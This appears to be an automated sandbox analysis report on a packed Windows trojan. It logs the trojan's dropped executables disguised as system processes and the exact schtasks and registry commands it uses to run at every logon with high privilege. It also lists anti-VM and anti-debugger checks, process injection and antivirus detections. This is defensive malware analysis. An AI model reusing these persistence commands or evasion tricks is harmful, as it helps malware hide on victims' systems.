NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75073000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x766bf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x766c8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x750ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7509c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75075000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ad000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ad000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75075000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7508a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ab000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7508c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ab000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

lsm.exe tried to sleep 318 seconds, actually delayed analysis time by 318 seconds

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (8 events)

file	C:\Documents and Settings\WmiPrvSE.exe
file	C:\PerfLogs\Admin\winlogon.exe
file	C:\Windows\System32\nlsbres\csrss.exe
file	C:\Windows\System32\PhotoScreensaver\conhost.exe
file	C:\Python27\libs\lsm.exe
file	C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat
file	C:\Windows\System32\NlsLexicons004c\taskhost.exe
file	C:\Python27\Scripts\IMEDICTUPDATE.exe

Creates a suspicious process (8 events)

cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat"
cmdline	"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2296 thread_handle: 0x00000388 process_identifier: 2292 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000038c	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2356 thread_handle: 0x00000390 process_identifier: 2352 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2416 thread_handle: 0x00000398 process_identifier: 2412 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a4	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2544 thread_handle: 0x000003ac process_identifier: 2540 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a8	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2604 thread_handle: 0x000003b4 process_identifier: 2600 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2664 thread_handle: 0x000003bc process_identifier: 2660 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b8	1	1
CreateProcessInternalW July 30, 2021, 10:28 a.m.	thread_identifier: 2772 thread_handle: 0x000003c8 process_identifier: 2768 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003cc	1	1
ShellExecuteExW July 30, 2021, 10:28 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 30, 2021, 10:28 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (5 events)

section

{u'size_of_data': u'0x0009808f', u'virtual_address': u'0x00002000', u'entropy': 7.982782990084296, u'name': u' ', u'virtual_size': u'0x00116000'}

entropy

7.98278299008

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00002428', u'virtual_address': u'0x00118000', u'entropy': 7.849149638231391, u'name': u' ', u'virtual_size': u'0x0000520f'}

entropy

7.84914963823

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x000002ac', u'virtual_address': u'0x0011e000', u'entropy': 7.687457886051185, u'name': u' ', u'virtual_size': u'0x000005bd'}

entropy

7.68745788605

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x002fdd04', u'virtual_address': u'0x0063a000', u'entropy': 7.9573328747516765, u'name': u'.boot', u'virtual_size': u'0x002fde00'}

entropy

7.95733287475

description

A section with a high entropy has been found

entropy

0.999453269235

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 30, 2021, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 30, 2021, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline	chcp 65001
cmdline	"schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline	ping -n 5 localhost
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (1 event)

host

62.109.1.30

Checks for the presence of known windows from debuggers and forensic tools (50 out of 162 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA July 30, 2021, 10:28 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 30, 2021, 10:28 a.m.	class_name: Regmonclass window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (28 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\conhost	reg_value	"C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\conhost	reg_value	"C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IMEDICTUPDATE	reg_value	"C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IMEDICTUPDATE	reg_value	"C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Windows\System32\nlsbres\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Windows\System32\nlsbres\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\PerfLogs\Admin\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\PerfLogs\Admin\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lsm	reg_value	"C:\Python27\libs\lsm.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lsm	reg_value	"C:\Python27\libs\lsm.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe", "C:\Documents and Settings\WmiPrvSE.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	"C:\Documents and Settings\WmiPrvSE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	"C:\Documents and Settings\WmiPrvSE.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg_value	explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe", "C:\Documents and Settings\WmiPrvSE.exe", "C:\Windows\System32\NlsLexicons004c\taskhost.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Windows\System32\NlsLexicons004c\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Windows\System32\NlsLexicons004c\taskhost.exe"
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f

Attempts to remove evidence of file being downloaded from the Internet (7 events)

file	C:\PerfLogs\Admin\winlogon.exe:Zone.Identifier
file	C:\Documents and Settings\WmiPrvSE.exe:Zone.Identifier
file	C:\Windows\System32\PhotoScreensaver\conhost.exe:Zone.Identifier
file	C:\Windows\System32\nlsbres\csrss.exe:Zone.Identifier
file	C:\Windows\System32\NlsLexicons004c\taskhost.exe:Zone.Identifier
file	C:\Python27\libs\lsm.exe:Zone.Identifier
file	C:\Python27\Scripts\IMEDICTUPDATE.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2840 resumed a thread in remote process 3020
NtResumeThread July 30, 2021, 10:28 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 3020	1	0	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 30, 2021, 10:28 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00 exception.symbol: desktop+0x5d2814 exception.instruction: in eax, dx exception.module: Desktop.exe exception.exception_code: 0xc0000096 exception.offset: 6105108 exception.address: 0x1682814 registers.esp: 3997396 registers.edi: 20920013 registers.eax: 1447909480 registers.ebp: 18702336 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 20575618 registers.ecx: 10	1	0	0

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetect.malware1
Lionic	Trojan.Win32.Malicious.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37284072
ALYac	Trojan.GenericKD.37284072
Cylance	Unsafe
